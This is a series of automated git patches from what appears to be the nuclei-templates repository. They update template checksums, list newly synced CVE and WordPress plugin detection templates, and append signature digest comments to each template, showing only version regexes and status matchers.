+http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:5e49fe0cc33e1186de691ecb2a3200205d01a211 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 +http/technologies/wordpress/plugins/wp-rollback.yaml:145d49708d027968e845531a36739f52eeb1ff3d +http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:977dd38e8ed67dad650e1bb90aae4b7074ff3ce5 +http/technologies/wordpress/plugins/wp-statistics.yaml:d274d87bcb46e8464ef502d06f790cdb0bf920bd +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9c08f1d159b8d3d468917332852e4d03d7718cdd -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:906508a5355b286fd400f6fbf1ce790e54b8cfde -http/technologies/wordpress/plugins/wpforms-lite.yaml:a3d60492b3441def632cf0f496b4f6b91535b692 -http/technologies/wordpress/plugins/wps-hide-login.yaml:49e23dfebb88ab4c3822f56d009869b8118e715d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:74b65c6c5ca927a3cc48713f2e12af3315585a02 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:b585238fc372f9d7131fb53c9bde96f0c8224553 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8669,7 +8676,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:84a112c3cbe9ded39da858b8b1a66a5dbff9ca1f +templates-checksum.txt:fddd283704ff533a7e3b08c221f0008dd2b38e56 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 0ada20140a7510baecc2fdd77858aee046af0146 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 19 Jun 2024 06:45:22 +0000 Subject: [PATCH 0398/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index cd720358dd..7a9c7a7cf3 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -29,6 +29,7 @@ on: - 'http/cves/2024/CVE-2024-31982.yaml' - 'http/cves/2024/CVE-2024-32113.yaml' - 'http/cves/2024/CVE-2024-3274.yaml' + - 'http/cves/2024/CVE-2024-34982.yaml' - 'http/cves/2024/CVE-2024-36837.yaml' - 'http/cves/2024/CVE-2024-37393.yaml' - 'http/exposed-panels/lorex-panel.yaml' @@ -39,6 +40,12 @@ on: - 'http/misconfiguration/apache/apache-server-status-localhost.yaml' - 'http/misconfiguration/cookies-without-secure.yaml' - 'http/technologies/nperf-server-detect.yaml' + - 'http/technologies/wordpress/plugins/copy-delete-posts.yaml' + - 'http/technologies/wordpress/plugins/image-optimization.yaml' + - 'http/technologies/wordpress/plugins/royal-elementor-addons.yaml' + - 'http/technologies/wordpress/plugins/simple-history.yaml' + - 'http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml' + - 'http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml' - 'http/vulnerabilities/gradio/gradio-lfi.yaml' - 'http/vulnerabilities/gradio/gradio-ssrf.yaml' - 'network/detection/mikrotik-ssh-detect.yaml' From cdb8c6230012cc477efdf29c75dcd622ba471540 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 19 Jun 2024 06:46:17 +0000 Subject: [PATCH 0399/1841] Auto Template Signing [Wed Jun 19 06:46:17 UTC 2024] :robot: --- http/cves/2023/CVE-2023-48241.yaml | 1 + http/cves/2023/CVE-2023-50719.yaml | 1 + http/cves/2023/CVE-2023-50720.yaml | 1 + http/cves/2024/CVE-2024-34982.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 198 files changed, 198 insertions(+) diff --git a/http/cves/2023/CVE-2023-48241.yaml b/http/cves/2023/CVE-2023-48241.yaml index 0bfe431889..d81ac0e770 100644 --- a/http/cves/2023/CVE-2023-48241.yaml +++ b/http/cves/2023/CVE-2023-48241.yaml @@ -51,3 +51,4 @@ http: - 'contains(header, "application/json")' - 'status_code == 200' condition: and +# digest: 4b0a00483046022100a87fc68c73caabf16ae33493b118c22387877377d4c4dcee3500d402561ab9af0221009079622be976acd9da8d175c001e76b238853660573fd519b191cd232d539006:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-50719.yaml b/http/cves/2023/CVE-2023-50719.yaml index 014823c5be..f395e8ade4 100644 --- a/http/cves/2023/CVE-2023-50719.yaml +++ b/http/cves/2023/CVE-2023-50719.yaml @@ -48,3 +48,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502202437cb05b76cc5a1500aecb995aa4be41861019af9c10335562818daa42e9e73022100a898352082fe08b207ef79b8b9d95c2053177f0beabcf3e7b7fe7c3172155532:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-50720.yaml b/http/cves/2023/CVE-2023-50720.yaml index 7667b18a27..26a6886200 100644 --- a/http/cves/2023/CVE-2023-50720.yaml +++ b/http/cves/2023/CVE-2023-50720.yaml @@ -49,3 +49,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100adbbefcf7ee7ed75f5e6fd338132b9fe1baf6e19e2c13d30fe15503fb6a6d82702204f11e0acc690cfd625e56c85ec7f435d49a61182415c9c6dae94a5a0052779ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-34982.yaml b/http/cves/2024/CVE-2024-34982.yaml index 7ec1c3be5d..7a5b254b59 100644 --- a/http/cves/2024/CVE-2024-34982.yaml +++ b/http/cves/2024/CVE-2024-34982.yaml @@ -69,3 +69,4 @@ http: - 'contains(body, "{{string}}" )' - 'contains(header, "text/html")' condition: and +# digest: 4a0a004730450220440784f1e1d309bfb1eee99fbcaf02afe7bfa185b48f07233df0f14cac9e9d9b0221009072b53098bb58d0d3efd14db1a3fc5f7b0b4593a0426fa060db0c42edd6f029:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..8d3d502ef0 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022079dcbc17815262aa4206c5bb973dbb5b81633827103f4ccbcfea402aea1e535302201bbdacfb6d5fd24cccadb80ccfae30e9a078d88e1bf1ac4da4d0e706dbfaea1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..5f1d0ac581 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f397d01e93553e3da296106eb315f0adee57bc8cf8b765c9e1e955690462bf05022056e16ca433593f00465cce5ed98d3ef99deda0d0a611fdeb51bfd9774296222b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..4bfcc2d24e 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ca2094ed1472ce80c492e08abcf5a3d28805444bea60baf1d6bae117775790f4022100badd6854ac2b69e53ae21deccbbe6d55f1186f393c026259e5daa93766b65ed5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..0950761fa3 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d9f57b3d631c508fb7675c1b1a2fe902d1688fcf047719e38b894ec548a6ad9702205858172248663f0bc86a2618453c3f0359037ac1e1a75f02f4215d95dd36718c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index f68ad2a6bf..12dab0df7e 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009dead1b6e453b7b06972fd992233cc6a12c884489fd3fa74a6cf68f2187d7c440221009100a70b38941758ee6377b0acb20989be8c6f2853e118760b9cf78138bccc54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 196cc7e8e8..5aa0805163 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205faf5d077dd41d8438ac1a2aeb76934896193ac47e5a1f77c8b13e17afdf8b1c02204804ab4267b004cc349f7265318e753c461ad52c61810ccbdcebac27e742b1a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 55362630df..db64c2b890 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f1421aab4518956b16ad35036f6f5fb80aacfc1c84d64a7c9a97d3a84c01bb3602202fb0deee560a02d9f94df3441af0fd706ae83943683ab2a0fbacdb52a068feea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8f33a47613 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202045a4378058cadd5d353fcf1003d1c16e9318e83d42a85b2c5e48abc3ae9c57022006c27e0a6da8c4b92e5176c6611adaff32eb4c1158c8d9a9f810d4bc397101ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..3dc91846ef 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c3cf67425fd4769df098e3ddd61b94125e77776e274be2e9954dfd806f5acdc9022059c9c4667f0f0d30ea9deba1ac5196bc89adc50ea0558198f021d180a46630ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..eb982fd10b 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d7fbc1d6b8c06594855d2c8c02afac131e7c8cec38c4c1dc4ca51965cc7b5a4f0220451988857f866cfa4d64843a4ec07a84085bd30eea88743f2658f4ac81937570:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..87db9714b7 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200a93677e5d006208589112b3ecdd20d97b05ab52c1be868a99d438c920fa3e42022100918d596bb1f1f78ff409022f0eed79f1df185eefa1a41bb049bf66285be411bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..f322d3d948 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cfb36bfed069943b25ec7d7c9c918e4bfca092fba29e4a505ef26e6c92f1bc5f022100e30019d688e9385b68943f690594d9fe8e460f9bb82a70d35879f8d2daee7a40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 0ed608cd92..6b19b81139 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d5e01596e86b560a554577a5f77219aa879f02e706b6216bae729c1dfe6ffaa8022100bcecebecf396bf8e9f4c37fcc1703b2220e8bb4e570599a597452f68045b2736:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..9ed9e1d735 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d64272207f20df90b1b5527d383f161bae2a5a675e234588d16d25c3109ef253022100ca7150b88319ab8f8f42e4b51ad7e5ab5d2a2923ec3142693c60f49395e4b6fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index d1e01c329b..e2298b375d 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220096cbef873dba28aa7a29fe16c79565b6fc3e6fefe3633e29c55ef2afe336460022100ae843aa44960896734aee0e8e12da102a28de9f74a6cfde126fce14948bfb85d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff 